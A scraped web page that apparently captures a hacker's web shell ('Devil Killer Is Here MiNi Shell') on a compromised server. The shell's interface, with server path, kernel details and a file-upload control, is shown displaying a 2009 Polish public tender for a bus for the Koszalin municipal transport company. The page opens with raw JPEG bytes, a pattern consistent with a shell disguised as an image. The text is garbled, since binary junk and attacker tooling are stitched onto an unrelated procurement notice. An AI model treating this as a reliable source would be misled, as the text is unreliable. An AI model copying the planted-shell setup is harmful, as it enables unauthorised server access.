JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/43947-N-2009.html

<p class="kh_header"><b>Koszalin: Dostawa dla MZK Spółki z o.o. w Koszalinie nowego autobusu (rok produkcji pojazdu 2008 lub nowszy)</b><br>
<b>Numer ogłoszenia: 43947 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie , ul. Gnieźnieńska 9, 75-736 Koszalin, woj. zachodniopomorskie, tel. 094 3423021, faks 094 3422768.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzk.koszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa dla MZK Spółki z o.o. w Koszalinie nowego autobusu (rok produkcji pojazdu 2008 lub nowszy).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa dla MZK nowego (rok produkcji pojazdu 2008 lub nowszy) autobusu spełniającego niżej określone warunki:
1. Parametry autobusu:
1.1. Autobus winien spełniać wymagania polskich przepisów w sprawie dopuszczenia pojazdów do ruchu, zawarte w Dziale III ustawy Prawo o ruchu drogowym ustawy z dnia 20 czerwca 1997 r ( Dz. U. z 1997 r, nr 98 poz. 602 z późniejszymi zmianami) oraz odpowiadać warunkom technicznym określonym w rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2003 r, nr 32 poz.262).
1.2. Autobus musi posiadać pełne świadectwo homologacji tj. świadectwo homologacji typu pojazdu oraz świadectwo homologacji typu pojazdu skompletowanego z pełnymi danymi technicznymi pojazdu.  
1.3. Warunki, wymagania, parametry techniczne oraz wyposażenie, jakie musi spełniać i posiadać oferowany autobus:
Jednostka napędowa:Silnik tego samego producenta co autobus, rzędowy, chłodzony cieczą, wysokoprężny z bezpośrednim wtryskiem paliwa, o pojemności skokowej od 2 500 do 3000 cm3 i mocy nie mniejszej niż 135 kW ; spełniający normę czystości spalin Euro-IV. 
Skrzynia: Manualna pięciobiegowa lub sześciobiegowa.
Ogumienie: Michelin. Komplet tarcz kół stalowych z ogumieniem letnim oraz komplet tarcz kół stalowych z ogumieniem zimowym, wyważone, bezdętkowe, zapewniające przebieg co najmniej 100.000 km, plus dodatkowo koło zapasowe pełno wymiarowe z ogumieniem letnim i zimowym, osłony piasty kół (kołpaki) - komplet. Opony w chwili odbioru pojazdu nie mogą być starsze niż 12 miesięcy.
Siedzenia pasażerskie:Fotele turystyczne z zintegrowanymi zagłówkami z pełną regulacją plus trzypunktowe automatyczne pasy bezpieczeństwa;Fotele - szybki montaż, demontaż szynowy; Kolor uzgodniony z zamawiającym.
Pokrowce tekstylne, dla wszystkich foteli i zagłówków, w kolorze siedzenia pasażerskiego.
Kabina kierowcy:lusterka zewnętrzne szerokokątne sterowane i podgrzewane elektrycznie;lusterka wewnętrzne zapewniające dostateczną widoczność przedziału pasażerskiego;fotel kierowcy komfortowy, hydraulicznie resorowany z wielopołożeniową możliwością regulacji siedziska i oparcia, zagłówek kierowcy regulowany indywidualnie;koło kierownicze z regulacją położenia w dwóch płaszczyznach plus poduszka powietrzna kierowcy;ścianka działowa za kierowcą; 
wieszak na odzież.
Ogrzewanie: 
podstawowe wodne wykorzystujące ciepło z silnika realizowane za pomocą grzejników konwertorowych prawa i lewa strona z wymuszonym nawiewem;
ogrzewanie niezależne od silnika nie mniej niż 3,5 KW konwektorowe prawa i lewa strona z wymuszonym nawiewem. Pobór paliwa ze zbiornika dodatkowego lub głównego w obu przypadkach z kontrolą zużycia paliwa poprzez indywidualny pomiar. Zbiornik musi być wyposażony w czujnik poziomu paliwa; 
klimatyzacja dachowa min 15 kW z indywidualnym rozprowadzeniem dla każdego pasażera w półce.
Układ hamulcowy:Układ hamulcowy hydrauliczny, dwu obwodowy z systemem ABS, ASR, EBV;Hamulce tarczowe na przedniej i tylnej osi;
Nadwozie i konstrukcja nośna:pojazd kategorii M2 według normy PN-89/S-02006;
nadwozie i konstrukcja nośna podłogi powinny być wykonane w oparciu o najnowsze, powszechnie stosowane technologie, pozwalające, na co najmniej, 12-letnią eksploatację bez konieczności wykonania naprawy głównej, a szczególnie napraw blacharskich nadwozia. Poszycie boczne wykonane z aluminium, ze stali wysokiej jakości lub innych materiałów zapewniających wymaganą wytrzymałość konstrukcji i odpornego na korozję;
Kolorystyka zewnętrzna - srebrny. Wykonawca załączy próbkę proponowanego koloru wraz z oznaczeniem palety barw.
Układy drzwiowe:Drzwi przednie otwierane elektrycznie, automatyczne, panoramiczne, szklane sterowane z miejsca kierowcy;
Wentylacja kabiny kierowcy:Wentylacja kabiny kierowcy za pomocą okna opuszczanego z lewej strony kierowcy i nawiewami z elektrycznym wymuszeniem obiegu zapewniającymi wymianę powietrza;
Pojemność autobusu:Minimum 19 miejsc siedzących dla pasażerów plus 1 miejsce dla kierowcy - łącznie20 miejsca siedzące.
Instalacja elektryczna:napięcie 12V;włącznik główny instalacji elektrycznej;światła przeciwmgielne (halogeny);gniazdo diagnostyczne;złącza przewodów i urządzeń czytelnie opisane w języku polskim;regulacja zasięgu reflektorów;boczne światła sygnalizacyjne;panel sterowania klimatyzacji, nagłośnienia i oświetlenia.
Wykonanie podłogi, ścian bocznych-wyposażenie: 
Podłoga wykonana z wysokiej jakości wykładzin, zmywalna, antypoślizgowa na całej powierzchni autobusu (podest dodatkowy do foteli);Izolacja dźwiękowo-termiczna przedziału pasażerskiego, pokrycie ścian oraz słupków bocznych tapicerka miękką; 
Półki na bagaż podręczny (zabezpieczone przed wypadnięciem bagaży) z kanałem klimatyzacji;Oświetlenie wewnętrzne centralne;Oświetlenie diodowe korytarzowe;
Oświetlenie neonowe(światłowody); Luk dachowy-pełniący rolę wyjścia awaryjnego zgodnie z normą EC;Filtr cząstek stałych;Pogłębiony bagażnik;Barierki bezpieczeństwa;Szyby panoramiczne, atermiczne.
Zbiornik paliwa o pojemności zapewniającej przebieg minimum 500 km bez dodatkowego tankowania.Dodatkowe wyposażenie:zamek centralny sterowany falami radiowymi z pilota;elektroniczna tablica kierunkowa z przodu (element świecący dioda jasny bursztyn) - ze względu na unifikację preferowana Zakładu Elektroniki i Mechaniki Precyzyjnej R&G Sp. z o.o., ul Traugutta 7, 39-300 Mielec lub Pixel Sp. z o.o. ul. Jana Pawła II 28, 86-031 Osielsko; tachograf cyfrowy DTCO 1381;immobilizer;dodatkowy zewnętrzny bagażnik tzw. plecak;hak holowniczy; 
czujnik cofania;zestaw autokarowy: TV mp3/wzmacniacz, mikrofon, radio, nawigacja;tempo 100 km/h (warunki dodatkowe dla autobusów dopuszczalnej prędkości do 100km/h zgodnie z par.23 Dz.U. nr 32 poz.262) potwierdzone przez uprawnioną okręgowa stację diagnostyczną z odpowiednim certyfikatem.
Autobus powinien posiadać:dwie gaśnice proszkowe ze wskaźnikiem sprawności o wadze 2 kg każda, jedna umieszczona w kabinie kierowcy, druga w łatwo dostępnym miejscu przestrzeni pasażerskiej; zabezpieczone przed kradzieżą, posiadające odpowiedni certyfikat CNBOP.1 odblaskowy trójkąt;kamizelka odblaskowo ostrzegawcza;apteczka pierwszej pomocy;
2 kliny blokujące koła;zestaw narzędzi do wymiany koła;linka holownicza z zaczepami holowniczymi zgodna z Rozporządzeniem Ministra Infrastruktury z dnia 31 grudnia 2002r w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia Dz.U. z 2003r Nr 32 poz. 262 (ze zmianami) - dostosowane do masy pojazdu.Młotki do rozbijania szyb. 1 sztuka mocowana w zasięgu rąk kierowcy wraz z nożem do rozcinania pasów bezpieczeństwa oraz po 1 szt. młotka przy każdym oznakowanym wyjściu awaryjnym;Minimum dwa komplety kluczyków do pojazdu z pilotami do alarmu;
1.4.W ofercie technicznej Wykonawca poda dokładny opis techniczny podzespołów i zastosowanych rozwiązań w autobusie. (Do oferty Wykonawca dołączy dokumentację techniczną oraz zdjęcia oferowanego autobusu) 
1.5.Zamawiający wymaga, aby oferowany typ autobusu nie był prototypem, tj., aby został wyprodukowany i sprzedany przed terminem składania ofert w liczbie, co najmniej 40 sztuk. Zamawiający uwzględni w tej liczbie różne wersje i odmiany wykonania oferowanego typu autobusu wynikające z indywidualnych potrzeb odbiorców. Liczbę tą stanowią tylko autobusy posiadające silnik spełniający normę Euro IV.
1.6.W cenie dostawy Wykonawca uwzględni następujące pozycje:
a)	przeszkolenie co najmniej 4 kierowców i 2 dyspozytorów w zakresie obsługi samochodów i tachografu (sczytywanie danych i archiwizacja) w stacji serwisowej Wykonawcy. 
b)	wyposażenie Zamawiającego w dokumentację (w języku polskim) techniczno-eksploatacyjną, instrukcje obsługi dla kierowców, książki napraw, pełny katalog części zamiennych oraz pełna dokumentacja instalacji elektrycznej.
1.7.Wykonawca udzieli minimum:
a)	24 miesięcznej gwarancji na zespoły i podzespoły mechaniczne, elektryczne i 	elektroniczne;
b)	24 miesięcznej gwarancji na pozostałe elementy nie wymienione w ppkt. a); 
c)	144 miesięcznej gwarancji na nadwozie.  
1.8. Wykonawca oświadcza, że zapewni dostępność części zamiennych i podzespołów przez okres minimum 15 lat.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.12.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi dla swej ważności być zabezpieczona wadium w wysokości 8.000,00 zł. (słownie złotych: osiem tysięcy).Termin ważności wadium - od terminu składania ofert do terminu związania ofertą(z zastrzeżeniem pkt 4 ppkt c)
2. Wadium wnosi się przed upływem terminu składania ofert. Wadium wnoszone w formie pieniężnej musi wpłynąć na rachunek Zamawiającego przed terminem składania ofert. Wadium wnoszone w pozostałych formach należy dołączyć do oferty w oryginale. 
3.Wadium może być wnoszone w jednej lub kilku następujących formach: 
a.	pieniądzu;
b.	Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych ;
d.	gwarancjach ubezpieczeniowych ;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późniejszymi zmianami).
4.Gwarancja bankowa lub gwarancja ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać, - co najmniej następujące warunki:
a.	Ustalać beneficjenta gwarancji, tj. jego nazwę i adres;
b.	określać kwotę gwarantowaną w złotych;
c.	określać termin ważności gwarancji (termin ważności gwarancji winien być dłuższy o 15 dni od terminu związania z ofertą);
d.	określać przedmiot gwarancji, nazwę i numer zamówienia wynikający ze specyfikacji istotnych warunków zamówienia oraz tytuł (np. wadium);
e.	być gwarancją samoistną, nie odwoływalną i bezwarunkową, płatną na każde żądanie).
5.Wadium wnoszone w formie pieniężnej należy wpłacać przelewem na rachunek: 
BANK MILLENNIUM O/KOSZALIN nr rachunku S.W.I.F.T. BIGBPLPWXXX,
IBAN PL 75 1160 2202 0000 0000 6175 0721 z opisem wadium - przetarg nieograniczony nr NT-LK-2210-08-01.09 (dostawa autobusu). 
6. Zamawiający zwraca niezwłocznie wadium, jeżeli:
a.	upłynął termin związania ofertą;
b.	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy; 
c.	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
7. Z zastrzeżeniem pkt 9, Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
a.	który wycofał ofertę przed upływem terminu składania ofert;
b.	który został wykluczony z postępowania;
c.	którego oferta została odrzucona.
8.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 25 ust. 3 ustawy z dnia 29 stycznia 2004r Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1 wymienionej ustawy, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Wykonawca, którego oferta nie będzie zabezpieczona akceptowalną formą wadium zostanie przez Zamawiającego wykluczony<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy spełniający wymogi Art. 22 pkt 1 i nie wykluczeni na podstawie Art. 24 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych wraz z późniejszymi zmianami oraz spełniający wymogi SIWZ.
2.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają doświadczenie w prowadzeniu działalności będącej przedmiotem zamówienia tj. posiadają doświadczenie potwierdzone wykonaniem i zbyciem co najmniej 40 sztuk autobusów. Zamawiający uwzględni w tej liczbie różne wersje i odmiany wykonania oferowanego typu autobusu wynikające z indywidualnych potrzeb odbiorców. Liczbę tą stanowią tylko autobusy posiadające silnik spełniający normę Euro IV.
3.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają polisę OC. Wymagana suma ubezpieczenia nie mniejsza niż 1 000 000,00 zł (słownie złotych: jeden milion).
Ocena spełnienia warunków dokonywana będzie na podstawie analizy i weryfikacji przedstawionych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu;
1.Oświadczenie (załącznik nr 2 do SIWZ) Wykonawcy dotyczące Art. 22 ust. 1 pkt. 1,2,3,4 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych wraz z późniejszymi zmianami to jest, że:
a.	posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
(Nie dopuszcza się składania oświadczeń w formie kserokopii poświadczonej za zgodność z oryginałem).
2.Dokumenty potwierdzające spełnienie warunków, o których mowa w art. 22 ust.1 i art. 24 ustawy:
a.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert;
b.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidywane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert;
c.	wykaz (załącznik nr 3 do SIWZ) wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom i usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy i usługi zostały wykonane należycie. Jako niezbędne doświadczenie Zamawiający uzna wykonanie i zbycie co najmniej 40 sztuk autobusów. Zamawiający uwzględni w tej liczbie różne wersje i odmiany wykonania oferowanego typu autobusu wynikające z indywidualnych potrzeb odbiorców. Liczbę tą stanowią tylko autobusy posiadające silnik spełniający normę Euro IV;
d.	dokument potwierdzający, że wyprodukowano i sprzedano przed terminem składania ofert, co najmniej 40 sztuk autobusów;  
e.	świadectwo homologacji typu pojazdu oraz świadectwo homologacji typu pojazdu skompletowanego z pełnymi danymi technicznymi pojazdu;  
f.	polisa ubezpieczeniowa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Wymagana suma ubezpieczenia nie mniejsza niż 1 000.000,00 zł (słownie złotych: jeden milion). W przypadku upływu terminu ważności polisy w trakcie realizacji umowy Wykonawca jest zobowiązany do przedstawienia Zamawiającemu nowej polisy, na tych samych warunkach, na 7 dni przed upływem terminu obowiązywania poprzedniej polisy; 
g.	w przypadku wnoszenia oferty przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wymagane dokumenty należy złożyć na zasadach określonych w § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605).

W przypadku ubiegania się o udzielenie zamówienia wspólnie przez dwóch lub więcej Wykonawców dokumenty wymienione w punkcie 6 SIWZ muszą złożyć wszyscy Wykonawcy ubiegający się o udzielenie zamówienia.
Wymienione dokumenty mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę, osobę działającą w jego imieniu lub notariusza. (Zamawiający wymaga, aby każda strona kserokopii była poświadczona za zgodność z oryginałem)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 99</li>
<li>2 - umiejscowienie autoryzowanego serwisu danej marki - 1</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzk.koszalin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie
ul. Gnieźnieńska 9
75-736 Koszalin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 09:00, miejsce: Miejski Zakład Komunikacji Spółka z o.o. w Koszalinie
ul. Gnieźnieńska 9
75-736 Koszalin
pokój nr 20 sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I.Opis sposobu przygotowania ofert;
1.Oferta musi być złożona na dołączonym do specyfikacji formularzu, który stanowi integralną część specyfikacji (załącznik nr 1). Musi on być wypełniony czytelnie w języku polskim. Wszystkie załączniki winny być podpisane przez osoby uprawnione, ponumerowane i zszyte w jeden pakiet opatrzony spisem. Ofertę należy umieścić w zamkniętej wewnętrznej i zewnętrznej kopercie, które będą zaadresowane na Zamawiającego oraz będą posiadać oznaczenie Przetarg nieograniczony na dostawę autobusu dla Miejskiego Zakładu Komunikacji Spółki z o.o. w Koszalinie.
Poza wymienionymi oznaczeniami koperta wewnętrzna powinna posiadać nazwę i adres Wykonawcy. 
2. Oferta winna zawierać następujące dane dotyczące Wykonawcy:
a.	nazwa firmy;
b.	imię i nazwisko osoby działającej w imieniu Wykonawcy, adres firmy, pieczęć firmy.
3. Oferta będzie odrzucona w przypadkach określonych w Art.89 i w Art.24 ust.4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych tj. jeżeli:
a.	jest niezgodna z ustawą;
b.	jej treść nie odpowiada treści istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust 2 pkt 3;
c.	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów z zwalczaniu nieuczciwej konkurencji;
d.	zawiera rażąco nisko cenę w stosunku do przedmiotu zamówienia;
e.	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia; 
f.	zawiera błędy w obliczeniu ceny;
g.	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
h.	jest nieważna na podstawie odrębnych przepisów;
oraz jeżeli: 	
i.	nie będzie złożona na załączonym formularzu oferty; 
j.	jest nieczytelna, nie podpisana lub podpisana przez osobę nieuprawnioną;
Do wypełnionej czytelnie oferty należy dołączyć wszystkie dokumenty oraz oświadczenia wymienione w punkcie 6 SIWZ; jeżeli wykonawcę reprezentuje pełnomocnik - należy dołączyć pełnomocnictwo. 
II. Wzajemne rozliczenie; Informacje dotyczące walut obcych, w jakich mogą być prowadzone rozliczenia między Zamawiającym a Wykonawcą, jeżeli Zamawiający przewiduje rozliczenia w walutach obcych;
1.Wynagrodzenie za usługę będzie rozliczone na podstawie faktury VAT wystawionej przez Wykonawcę po wykonaniu usługi, po przeszkoleniu pracowników oraz stwierdzeniu przez Zamawiającego, że usługa została wykonana należycie.
